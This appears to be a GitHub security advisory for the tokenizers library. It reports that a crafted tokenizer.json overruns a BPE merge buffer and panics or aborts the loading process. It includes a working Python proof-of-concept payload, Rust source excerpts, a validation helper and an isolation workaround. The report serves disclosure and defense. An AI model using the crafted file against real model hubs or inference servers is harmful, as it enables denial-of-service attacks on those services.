[Security] Load-time process abort when loading a malicious tokenizer.json (BPE merge buffer overrun) #2094

@geo-chen

Summary

Loading an untrusted tokenizer.json panics the BPE model builder and, in Rust and FFI embeddings that do not unwind panics, aborts the entire process. The builder sizes a scratch buffer to the longest vocabulary key, then writes the concatenation of each merge rule into it. A merge whose concatenated token is longer than every vocabulary key indexes past the end of the buffer, and Rust's bounds check turns that into a panic. Hugging Face models commonly ship a tokenizer.json, and these files are routinely downloaded and shared, so loading one is a common, deliberate action.

Details

In tokenizers/src/models/bpe/model.rs, BpeBuilder::build:

let mut buffer: Vec<u8> = vec![0; max_len];          // line 251: max_len = byte length of the LONGEST vocab key
...
buffer[0..a.len()].copy_from_slice(a.as_bytes());    // line 264
let b_len = b.len() - prefix_len;
let merge_len = a.len() + b_len;
buffer[a.len()..merge_len].copy_from_slice(&b.as_bytes()[prefix_len..]); // line 267: panics when merge_len > max_len

buffer is sized to max_len, the byte length of the longest vocab key. For each merge rule (a, b) the code writes the concatenation a + b[prefix_len..], of length merge_len = a.len() + b.len() - prefix_len, into that buffer. When merge_len exceeds max_len, that is, when the concatenated merge token is longer than every vocab key, the slice range at line 267 is out of bounds and Rust panics.

The code already has a graceful error path for out-of-vocabulary merge tokens (Error::MergeTokenOutOfVocabulary, exercised by the test test_bpe_from_file_merge_token_oov), but the buffer write happens before that check, so this case panics instead of returning the intended error.

A secondary defect at the same site: with continuing_subword_prefix set and a merge whose b.len() < prefix_len, the usize subtraction b.len() - prefix_len underflows, which panics in debug builds and wraps around in release builds, corrupting merge_len.
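The length arithmetic described above can be modelled outside the crate. The following is a minimal sketch, not the library's code: find_unsafe_merges is a hypothetical helper that takes the "model" object of a tokenizer.json and flags merges for which merge_len would exceed max_len, or for which b is shorter than the prefix. It assumes well-formed merge entries (either ["a", "b"] pairs or legacy "a b" strings) and measures lengths in UTF-8 bytes, as Rust's len() does.

```python
def find_unsafe_merges(model):
    """Return (merge_index, reason) pairs for merges that would break the
    buffer arithmetic described in this report. Hypothetical helper."""
    vocab = model.get("vocab") or {}
    prefix = model.get("continuing_subword_prefix") or ""
    prefix_len = len(prefix.encode("utf-8"))
    # max_len mirrors the scratch buffer size: longest vocab key, in bytes.
    max_len = max((len(key.encode("utf-8")) for key in vocab), default=0)

    problems = []
    for index, merge in enumerate(model.get("merges") or []):
        # Assumption: entries are ["a", "b"] pairs or legacy "a b" strings.
        if isinstance(merge, (list, tuple)):
            a, b = merge
        else:
            a, b = merge.split(" ", 1)
        a_len = len(a.encode("utf-8"))
        b_len = len(b.encode("utf-8"))
        if b_len < prefix_len:
            # b.len() - prefix_len would underflow in the Rust code.
            problems.append((index, "b shorter than continuing_subword_prefix"))
            continue
        merge_len = a_len + b_len - prefix_len
        if merge_len > max_len:
            problems.append((index, f"merge_len {merge_len} > max_len {max_len}"))
    return problems


# The "model" section from the PoC in this report.
poc_model = {
    "vocab": {"aa": 0, "bb": 1},
    "merges": [["aa", "bb"]],
    "continuing_subword_prefix": None,
}
print(find_unsafe_merges(poc_model))
```

For the PoC model this flags merge 0, since "aabb" is 4 bytes and the longest vocab key is 2. A check like this only covers the two conditions described here; it is not a substitute for fixing the ordering of the bounds check and the out-of-vocabulary check in build.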

Sink path: Tokenizer.from_file / from_str deserializes the BPE model (bpe/serialization.rs), calls BpeBuilder::vocab_and_merges, then build, reaching line 267. This is pure load time, no encoding needed. No existing advisory describes the max_len buffer overrun.

PoC

pip install tokenizers
python poc_bpe_panic.py

poc_bpe_panic.py:

import os, json
from tokenizers import Tokenizer
# vocab's longest key is length 2 ("aa","bb"); merge ["aa","bb"] -> "aabb" (len 4) > max_len (2),
# overrunning the merge buffer at bpe/model.rs:267 during LOAD.
malicious = {
    "version": "1.0", "truncation": None, "padding": None,
    "added_tokens": [], "normalizer": None, "pre_tokenizer": None,
    "post_processor": None, "decoder": None,
    "model": {
        "type": "BPE", "dropout": None, "unk_token": None,
        "continuing_subword_prefix": None, "end_of_word_suffix": None,
        "fuse_unk": False, "byte_fallback": False, "ignore_merges": False,
        "vocab": {"aa": 0, "bb": 1},
        "merges": [["aa", "bb"]],
    },
}
p = os.path.expanduser("~/poc_tokenizer.json")
with open(p, "w") as f:   # close the file so the JSON is fully written before loading
    json.dump(malicious, f)
Tokenizer.from_file(p)   # panics: range end index 4 out of range for slice of length 2

Observed (tokenizers 0.23.1): thread '<unnamed>' panicked at .../bpe/model.rs:267:23: range end index 4 out of range for slice of length 2, surfacing in the Python binding as pyo3_runtime.PanicException (exit 1), instantly from a tiny input.

Impact

A trivially crafted tokenizer.json causes a denial of service when loaded. In the Python binding the panic surfaces as a catchable exception, but in pure-Rust consumers and FFI embeddings of the tokenizers crate (where panics are not unwound, or panic = "abort" is set, common in release builds) it aborts the entire process. Any service that loads model-supplied tokenizer files (model hubs, inference servers, automated model loaders) is exposed.
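Until the builder returns an error for this input, one possible stopgap for services that load untrusted files is to attempt the load in a child process first, so that a panic or abort cannot take down the parent. The sketch below is an illustration under stated assumptions, not a recommendation from the maintainers: loads_cleanly and CHILD_LOADER are hypothetical names, and the child simply calls Tokenizer.from_file on the path it is given.

```python
import subprocess
import sys

# Hypothetical child program: load the tokenizer and exit 0 on success.
# An uncaught panic exception or a process abort yields a non-zero status.
CHILD_LOADER = (
    "import sys\n"
    "from tokenizers import Tokenizer\n"
    "Tokenizer.from_file(sys.argv[1])\n"
)


def loads_cleanly(path, child_code=CHILD_LOADER, timeout=30.0):
    """Return True if a child interpreter runs child_code on path and exits 0."""
    try:
        proc = subprocess.run(
            [sys.executable, "-c", child_code, path],
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL,
            timeout=timeout,
        )
    except subprocess.TimeoutExpired:
        # Treat a hung load as a failed load.
        return False
    return proc.returncode == 0
```

A caller would run loads_cleanly(path) and only load the file in-process when it returns True. This costs an extra interpreter start per file and does not address the root cause.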
